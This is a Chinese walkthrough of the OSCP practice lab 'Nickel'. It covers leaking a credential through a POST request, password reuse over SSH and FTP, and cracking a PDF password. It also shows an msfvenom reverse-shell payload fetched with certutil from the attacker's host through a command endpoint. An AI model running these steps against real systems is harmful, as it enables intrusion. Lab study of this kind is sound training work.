OSCP靶场--Nickel

news2024/12/23 16:27:51

OSCP靶场–Nickel

考点(1.POST方法请求信息 2.ftp,ssh密码复用 3.pdf文件密码爆破)

1.nmap扫描

┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.237.99 -sV -sC -p-  --min-rate 5000 
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-22 04:06 EST
Nmap scan report for 192.168.237.99
Host is up (0.25s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
22/tcp    open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA)
|   256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA)
|_  256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2024-01-29T02:08:16
|_Not valid after:  2024-07-30T02:08:16
|_ssl-date: 2024-02-22T09:10:45+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: NICKEL
|   NetBIOS_Domain_Name: NICKEL
|   NetBIOS_Computer_Name: NICKEL
|   DNS_Domain_Name: nickel
|   DNS_Computer_Name: nickel
|   Product_Version: 10.0.18362
|_  System_Time: 2024-02-22T09:09:32+00:00
5040/tcp  open  unknown
8089/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-HTTPAPI/2.0
33333/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-22T09:09:32
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 271.78 seconds


2. user priv

### 无响应:
http://192.168.237.99:33333/
##
http://192.168.237.99:8089/
## 查看源码:
<h1>DevOps Dashboard</h1>
<hr>
<form action='http://169.254.153.224:33333/list-current-deployments' method='GET'>
<input type='submit' value='List Current Deployments'>
</form>
<br>
<form action='http://169.254.153.224:33333' method='GET'>
<input type='submit' value='List Running Processes'>
</form>
<br>
<form action='http://169.254.153.224:33333/list-active-nodes' method='GET'>
<input type='submit' value='List Active Nodes'>
</form>
<hr>

在这里插入图片描述
访问无响应:http://169.254.153.224:33333/list-current-deployments
将url拼接到:http://192.168.237.99:33333/list-running-procs
在这里插入图片描述
GET方法变POST方法:
在这里插入图片描述

2.1 发现敏感信息:

cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p 

"Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh

base64解码:https://base64.us/
在这里插入图片描述

2.2 ssh登陆

ariah:NowiseSloopTheory139
ssh ariah@192.168.237.99

##
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.

ariah@NICKEL C:\Users\ariah>whoami
nickel\ariah

ariah@NICKEL C:\Users\ariah>ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.237.99
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.237.254

ariah@NICKEL C:\Users\ariah>dir
 Volume in drive C has no label.
 Volume Serial Number is 9451-68F7

 Directory of C:\Users\ariah

10/15/2020  06:23 AM    <DIR>          .
10/15/2020  06:23 AM    <DIR>          ..
10/15/2020  06:23 AM    <DIR>          3D Objects
10/15/2020  06:23 AM    <DIR>          Contacts
04/14/2022  03:46 AM    <DIR>          Desktop
10/15/2020  06:23 AM    <DIR>          Documents
10/15/2020  06:23 AM    <DIR>          Downloads
10/15/2020  06:23 AM    <DIR>          Favorites
10/15/2020  06:23 AM    <DIR>          Links
10/15/2020  06:23 AM    <DIR>          Music
10/15/2020  06:25 AM    <DIR>          Pictures
10/15/2020  06:23 AM    <DIR>          Saved Games
10/15/2020  06:24 AM    <DIR>          Searches
10/15/2020  06:23 AM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)   7,659,962,368 bytes free

ariah@NICKEL C:\Users\ariah>cd Desktop

ariah@NICKEL C:\Users\ariah\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 9451-68F7

 Directory of C:\Users\ariah\Desktop

04/14/2022  03:46 AM    <DIR>          .
04/14/2022  03:46 AM    <DIR>          ..
02/21/2024  11:40 PM                34 local.txt
               1 File(s)             34 bytes
               2 Dir(s)   7,659,962,368 bytes free

##
ariah@NICKEL C:\Users\ariah\Desktop>type local.txt
bc4d84f298cb790dc02b6513b767a143

3. root priv

windows提权:

3.1 winpeas.exe无发现有效信息:

ariah@NICKEL C:\Users\ariah\Desktop>certutil -urlcache -split -f http://192.168.45.234/winpeas.exe
###
ariah@NICKEL C:\Users\ariah\Desktop>winpeas.exe

3.2 ssh密码复用:登陆ftp:ariah:NowiseSloopTheory139

┌──(root㉿kali)-[~/Desktop]
└─# ftp 192.168.178.99                        
Connected to 192.168.178.99.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (192.168.178.99:root): ariah
331 Password required for ariah
Password: 
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||61706|)
150 Opening data channel for directory listing of "/"
-r--r--r-- 1 ftp ftp          46235 Sep 01  2020 Infrastructure.pdf
226 Successfully transferred "/"
ftp> get Infrastructure.pdf
local: Infrastructure.pdf remote: Infrastructure.pdf
229 Entering Extended Passive Mode (|||50539|)
150 Opening data channel for file download from server of "/Infrastructure.pdf"
100% |********************************************************************| 46235       33.65 KiB/s    00:00 ETA
226 Successfully transferred "/Infrastructure.pdf"
46235 bytes received in 00:01 (33.65 KiB/s)

## pdf爆破:
┌──(root㉿kali)-[~/Desktop]
└─# pdfcrack Infrastructure.pdf -w /usr/share/wordlists/rockyou.txt 
PDF version 1.7
Security Handler: Standard
V: 2
R: 3
P: -1060
Length: 128
Encrypted Metadata: True
FileID: 14350d814f7c974db9234e3e719e360b
U: 6aa1a24681b93038947f76796470dbb100000000000000000000000000000000
O: d9363dc61ac080ac4b9dad4f036888567a2d468a6703faf6216af1eb307921b0
Average Speed: 43868.9 w/s. Current Word: 'loritta30'
Average Speed: 44370.4 w/s. Current Word: 'graff01'
Average Speed: 44473.4 w/s. Current Word: 'xxxppp'
Average Speed: 44165.3 w/s. Current Word: 'stellyme'
Average Speed: 44073.3 w/s. Current Word: 'rachel41987'
Average Speed: 44192.8 w/s. Current Word: 'music_girl'
Average Speed: 44549.9 w/s. Current Word: 'lilneisy'
Average Speed: 44240.4 w/s. Current Word: 'jen5878'
Average Speed: 44587.6 w/s. Current Word: 'gagicumaiubeste'
Average Speed: 44437.6 w/s. Current Word: 'd.staley'
Average Speed: 44317.7 w/s. Current Word: 'bd82CC*^'
found user-password: 'ariah4168'

## 使用pdf2john,johnpdf破解pdf:
┌──(root㉿kali)-[~/Desktop]
└─# pdf2john Infrastructure.pdf > 1.hash
                                                                                                                                             
┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt 1.hash  
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ariah4168        (Infrastructure.pdf)     
1g 0:00:00:57 DONE (2024-02-24 03:37) 0.01734g/s 173563p/s 173563c/s 173563C/s arial<3..ariadne01
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed. 

### pdf内容:
Infrastructure Notes
Temporary Command endpoint: http://nickel/?
Backup system: http://nickel-backup/backup
NAS: http://corp-nas/files

破解加密的pdf:
在这里插入图片描述

pdf内容:
在这里插入图片描述
修改hosts文件:
在这里插入图片描述

高权限命令接口:
在这里插入图片描述

3.3 反弹shell

## 生成木马
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o shell443.exe


┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80

## 下载木马:
http://nickel/?certutil%20-urlcache%20-split%20-f%20http://192.168.45.179/shell443.exe

## 监听:
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443  

## 执行反弹:
http://nickel/?shell443.exe

## proof.txt
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443              
listening on [any] 443 ...
connect to [192.168.45.179] from nickel [192.168.178.99] 50199
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.178.99
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.178.254

c:\Users\Administrator\Desktop>type proof.txt
type proof.txt
3e0fd8269fd99aaac34829668016651a

在这里插入图片描述
在这里插入图片描述

4.总结考点

### 1.POST方法请求信息
### 2.ftp,ssh密码复用
### 3.pdf文件密码爆破
###

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1467672.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

22款奔驰C260L升级小柏林音响 无损音质效果

奔驰新款C级号称奔驰轿车的小“S”&#xff0c;在配置方面上肯定也不能低的&#xff0c;提了一台低配的车型&#xff0c;通过后期升级加装件配置提升更高档次&#xff0c;打造独一无二的奔驰C级&#xff0c;此次来安排一套小柏林之声音响&#xff0c;效果怎么样&#xff0c;我们…

maven3旧版本的下载地址(含新版本)

因为现有的3.8版本与IDEA不兼容&#xff0c;我需要下载3.6版本&#xff0c;但是官网的位置非常隐蔽&#xff0c;找了很多资料才看到。故记录一下。 第一步 进入网址&#xff0c;选择需要的版本 Index of /dist/maven/maven-3 第二步 选择binaries 第三步 选择zip文件下载就可…

Nacos配置中心实战

目录 配置中心 什么是Nacos配置中心&#xff1f; SpringCloud整合Nacos配置中心 nacos server配置中心中准备配置数据 微服务接入配置中心 Config相关配置 RefreshScope实现动态感知 配置中心 在微服务架构中&#xff0c;当系统从一个单体应用&#xff0c;被拆分成分布式…

Qt应用-音乐播放器实例

本文讲解Qt音乐播放器应用实例。 实现主要功能 声音播放、暂停,拖动控制、声音大小调节; 播放列表控制; 歌词显示; 界面设计 pro文件中添加 # 播放媒体 QT += multimedia 头文件 #ifndef FRMMUSICPLAYER_H #define FRMMUSICPLAYER_H#include <QWidget> #include…

陆毅小女油画惊艳,11岁已超越王诗龄。

♥ 为方便您进行讨论和分享&#xff0c;同时也为能带给您不一样的参与感。请您在阅读本文之前&#xff0c;点击一下“关注”&#xff0c;非常感谢您的支持&#xff01; 文 |猴哥聊娱乐 编 辑|徐 婷 校 对|侯欢庭 陆毅假期宅家享天伦之乐&#xff0c;晒出二女儿小叶子的画作&…

wordpress免费主题模板

免费大图wordpress主题 首页是一张大图的免费wordpress主题模板。简洁实用&#xff0c;易上手。 https://www.jianzhanpress.com/?p5857 wordpress免费模板 动态效果的wordpress免费模板&#xff0c;banner是动态图片效果&#xff0c;视觉效果不错。 https://www.jianzhan…

Beyond Compare4破解方法

方式一 第一种办法&#xff08;也是最有效的&#xff09; 删除C:\Users\用户名\AppData\Roaming\Scooter Software\Beyond Compare 4下的所有文件&#xff0c;重启Beyond Compare 4即可&#xff08;注意&#xff1a;用户名下的AppData文件夹有可能会被隐藏起来) 方式二 删…

第2讲-Memory

存储系统概述 存储单元电路

万字干货-京东零售数据资产能力升级与实践

开篇 京东自营和商家自运营模式&#xff0c;以及伴随的多种运营视角、多种组合计算、多种销售属性等数据维度&#xff0c;相较于行业同等量级&#xff0c;数据处理的难度与复杂度都显著增加。如何从海量的数据模型与数据指标中提升检索数据的效率&#xff0c;降低数据存算的成…

论文阅读——SimpleClick

SimpleClick: Interactive Image Segmentation with Simple Vision Transformers 模型直接在VIT上增加交互是分割 用VIT MAE方法训练的预训练权重 用交互式分割方法微调&#xff0c;微调流程&#xff1a; 1、在当前分割自动模拟点击&#xff0c;没有人为提供的点击 受到RITM启发…

BERT学习笔记

论文&#xff1a;《BERT: Pre-training of Deep Bidirectional Transformers for Language Understanding》&#xff0c;2019 代码&#xff1a;[tensorflow]&#xff0c;[pytorch] 来源&#xff1a;李沐精度BERT 0、摘要 与之前模型的区别&#xff1a; GPT考虑的是一个单向…

FairyGUI × Cocos Creator 3.7.3 引入报错解决

Cocos Creator 3.7.3引入fgui库 package.json添加这个依赖 "devDependencies": {"fairygui-cc": "latest"}执行npm i 报错解决 使用import引入fairygui-cc&#xff0c;就会有报错和警告&#xff0c;简单处理一下。 鼠标随便点一下也会出警告…

300分钟吃透分布式缓存-13讲:如何完整学习MC协议及优化client访问?

协议分析 异常错误响应 接下来&#xff0c;我们来完整学习 Mc 协议。在学习 Mc 协议之前&#xff0c;首先来看看 Mc 处理协议指令&#xff0c;如果发现异常&#xff0c;如何进行异常错误响应的。Mc 在处理所有 client 端指令时&#xff0c;如果遇到错误&#xff0c;就会返回 …

Ubuntu20.04 查看系统版本号

目录 uname -auname -vlsb_release -acat /etc/issuecat /proc/version uname -a 查看系统发行版本号和操作系统版本 uname -v 查看版本号 lsb_release -a 查看发行版本信息 cat /etc/issue 查看系统版本 cat /proc/version 查看内核的版本号

Linux笔记--文件与目录

ls /--查看根目录 一、介绍 1.目录结构 // 5.3 FHS (Filesystem Hierarchy Standard ) 文件层次结构标准 (标准规范每个特定的目录应该放什么 bin:全称 binary&#xff0c;含义是二进制。该目录中存储的都是一些二进制文件&#xff0c;文件都是可以被运行的。(一些最经常使…

洛谷P5741 旗鼓相当的对手-加强版 题解

#题外话&#xff08;第40篇题解&#xff09;&#xff08;本题为普及-难度&#xff09; #先看题目 题目链接https://www.luogu.com.cn/problem/P5741 #思路&#xff08;看代码&#xff09; #代码 &#xff08;看思路&#xff09; #include <bits/stdc.h>//脑子文件 usi…

VTK通过线段裁剪

线段拆分网格 void retrustMesh(vtkSmartPointer<vtkPolyData> polydata, vtkSmartPointer<vtkPoints> intermediatePoint) {vtkSmartPointer<vtkPoints> srcPoints polydata->GetPoints();int pointSize intermediatePoint->GetNumberOfPoints();/…

算法【查找算法的概念】

查找算法概念 1、查找的基本概念2、评价查找算法3、问题: 查找过程中我们要研究什么? 1、查找的基本概念 查找的概念&#xff1a; 根据给定的某个值&#xff0c;在查找表中确定一个其关键字等于给定值的数据元素或者记录。 查找算法也可以叫搜索算法。查找算法就是从一个有序…

Spring Boot 手写starter!!!

原因&#xff1a;为什么要手写starter&#xff1f;&#xff1f;&#xff1f; 原因&#xff1a;简化功能。 实例&#xff1a;以分页为例&#xff1a;写一个starter。 1.首先定义一个PageX注解。 Target({ElementType.METHOD}) Retention(RetentionPolicy.RUNTIME) Documented p…